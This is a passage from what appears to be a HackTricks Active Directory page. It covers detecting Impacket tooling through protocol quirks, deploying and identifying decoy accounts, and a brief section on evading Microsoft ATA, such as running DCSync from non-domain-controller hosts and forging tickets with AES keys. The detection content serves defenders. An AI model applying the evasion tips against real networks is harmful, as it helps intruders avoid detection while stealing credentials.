    955 If you want to detect common AD tradecraft, **do not rely only on operator-controlled artifacts** such as renamed binaries, service names, temp batch files, or output paths. Baseline how legitimate Windows clients build [Kerberos](/hacktricks/windows-hardening/active-directory-methodology/kerberos-authentication), [NTLM](/hacktricks/windows-hardening/ntlm/overview), SMB, LDAP, DCE/RPC, and WMI traffic, then look for **implementation quirks** that remain even after the operator edits `psexec.py`, `wmiexec.py`, `dcomexec.py`, `atexec.py`, or `ntlmrelayx.py`.<sup>[[8]](#references)</sup>
    956 
    957 - **High-confidence standalone candidates** (after validating against your own baseline):
    958   - Authenticated DCE/RPC using `auth_context_id = 79231 + ctx_id`
    959   - DCE/RPC authentication padding filled with `0xff`
    960   - LDAP Kerberos binds that place a raw Kerberos `AP-REQ` directly in SPNEGO `mechToken`
    961   - SMB2/3 negotiate requests with ASCII-looking `ClientGuid` values
    962   - WMI `IWbemLevel1Login::NTLMLogin` using the non-standard namespace `//./root/cimv2`
    963   - Hardcoded Kerberos nonce values
    964 - **Better as correlation/scoring features**:
    965   - Sparse or duplicated Kerberos etype lists, unusual/missing `PA-DATA`, or TGS-REQ etype ordering that differs from native Windows
    966   - NTLM Type 1 messages missing version info or Type 3 messages with null host names
    967   - Raw NTLMSSP carried in DCE/RPC instead of SPNEGO, missing DCE/RPC verification trailers, or SPNEGO/Kerberos OID mismatches
    968   - Several of these traits from the same host/user/session/time window are far stronger than any single weak field
    969 - **Use as enrichment, not as standalone alerts**:
    970   - Default filenames, output paths, random service names, temporary batch names, default computer account names, and tool-specific HTTP/WebDAV/RDP/MSSQL strings
    971   - These are easy for operators to change and are best used to explain why a cross-protocol cluster is suspicious
    972 - **Operational notes**:
    973   - Some of these signals require decrypted traffic, [PCAP/Zeek parsing](https://github.com/HackTricks-wiki/hacktricks/blob/188de82beb54e70956b2952367a0af91d26758b8/src/generic-methodologies-and-resources/basic-forensic-methodology/pcap-inspection/README.md), ETW, or service-side visibility
    974   - Validate against Samba/Linux clients, appliances, and legacy software before promoting to alerts
    975   - Promote detections from enrichment -> hunting -> alerting as you build confidence in the baseline
    976 
    977 ### **Implementing Deception Techniques**
    978 
    979 - Implementing deception involves setting traps, like decoy users or computers, with features such as passwords that do not expire or are marked as Trusted for Delegation. A detailed approach includes creating users with specific rights or adding them to high privilege groups.<sup>[[2]](#references)</sup>
    980 - A practical example involves using tools like: `Create-DecoyUser -UserFirstName user -UserLastName manager-uncommon -Password Pass@123 | DeployUserDeception -UserFlag PasswordNeverExpires -GUID d07da11f-8a3d-42b6-b0aa-76c962be719a -Verbose`
    981 - More on deploying deception techniques can be found at [Deploy-Deception on GitHub](https://github.com/samratashok/Deploy-Deception).
    982 
    983 ### **Identifying Deception**
    984 
    985 - **For User Objects**: Suspicious indicators include atypical ObjectSID, infrequent logons, creation dates, and low bad password counts.
    986 - **General Indicators**: Comparing attributes of potential decoy objects with those of genuine ones can reveal inconsistencies. Tools like [HoneypotBuster](https://github.com/JavelinNetworks/HoneypotBuster) can assist in identifying such deceptions.
    987 
    988 ### **Bypassing Detection Systems**
    989 
    990 - **Microsoft ATA Detection Bypass**:
    991   - **User Enumeration**: Avoiding session enumeration on Domain Controllers to prevent ATA detection.
    992   - **Ticket Impersonation**: Utilizing **aes** keys for ticket creation helps evade detection by not downgrading to NTLM.
    993   - **DCSync Attacks**: Executing from a non-Domain Controller to avoid ATA detection is advised, as direct execution from a Domain Controller will trigger alerts.
    994 
    995 ## References
    996 
    997 - [1] [A Guide to Attacking Domain Trusts](https://blog.harmj0y.net/redteaming/a-guide-to-attacking-domain-trusts/)
    998 - [2] [Forging Trusts for Deception in Active Directory](https://www.labofapenetrationtester.com/2018/10/deploy-deception.html)
    999 - [3] [From Domain Admin to Enterprise Admin](https://ired.team/offensive-security-experiments/active-directory-kerberos-abuse/child-domain-da-to-ea-in-parent-domain)
   1000 - [4] [LDAP BOF Collection – In-Memory LDAP Toolkit for Active Directory Exploitation](https://github.com/P0142/LDAP-Bof-Collection)
   1001 - [5] [TrustedSec – Holy Shuck! Weaponizing NTLM Hashes as a Wordlist](https://trustedsec.com/blog/holy-shuck-weaponizing-ntlm-hashes-as-a-wordlist)
   1002 - [6] [Barbhack 2025 CTF (NetExec AD Lab) – Pirates](https://0xdf.gitlab.io/2026/01/29/barbhack-2025-ctf.html)
   1003 - [7] [Hashcat](https://github.com/hashcat/hashcat)
   1004 - [8] [ThatTotallyRealMyth/Impacket-IoCs – Dissecting Impacket](https://github.com/ThatTotallyRealMyth/Impacket-IoCs)
   1005 - [9] [rub-softsec/onelogon - Onelogon: Taking over Active Directory Accounts via Netlogon](https://github.com/rub-softsec/onelogon)
   1006 - [10] [Microsoft - How to manage the changes in Netlogon secure channel connections associated with CVE-2020-1472](https://support.microsoft.com/en-us/topic/how-to-manage-the-changes-in-netlogon-secure-channel-connections-associated-with-cve-2020-1472-f7e8cc17-0309-1d6a-304e-5ba73cd1a11e)
   1007 - [11] [A journey into forgotten Null Session and MS-RPC interfaces](https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2024/05/22190247/A-journey-into-forgotten-Null-Session-and-MS-RPC-interfaces.pdf)
   1008 - [12] [SID filter as security boundary between domains? (Part 4) - Bypass SID filtering research](https://itm8.com/articles/sid-filter-as-security-boundary-between-domains-part-4)
   1009 - [13] [SID filter as security boundary between domains? (Part 5) - Golden GMSA trust attack - from child to parent](https://itm8.com/articles/sid-filter-as-security-boundary-between-domains-part-5)
   1010 - [14] [SID filter as security boundary between domains? (Part 6) - Schema change trust attack - from child to parent](https://itm8.com/articles/sid-filter-as-security-boundary-between-domains-part-6)
   1011 - [15] [From DA to EA with ESC5](https://specterops.io/blog/2023/05/16/from-da-to-ea-with-esc5/)
   1012 - [16] [Escalating from child domain's admins to enterprise admins in 5 minutes by abusing AD CS, a follow up](https://www.pkisolutions.com/escalating-from-child-domains-admins-to-enterprise-admins-in-5-minutes-by-abusing-ad-cs-a-follow-up/)
   1013 - [17] [An ACE Up the Sleeve: Designing Active Directory DACL Backdoors](https://specterops.io/assets/resources/an_ace_up_the_sleeve.pdf)
   1014 - [18] [NetExec pre2k module source](https://github.com/Pennyw0rth/NetExec/blob/main/nxc/modules/pre2k.py)
   1015 - [19] [Microsoft ADSchema - msDS-GroupMSAMembership attribute](https://learn.microsoft.com/en-us/windows/win32/adschema/a-msds-groupmsamembership)
   1016 - [20] [0xdf - HTB Pirate](https://0xdf.gitlab.io/2026/09/05/htb-pirate.html)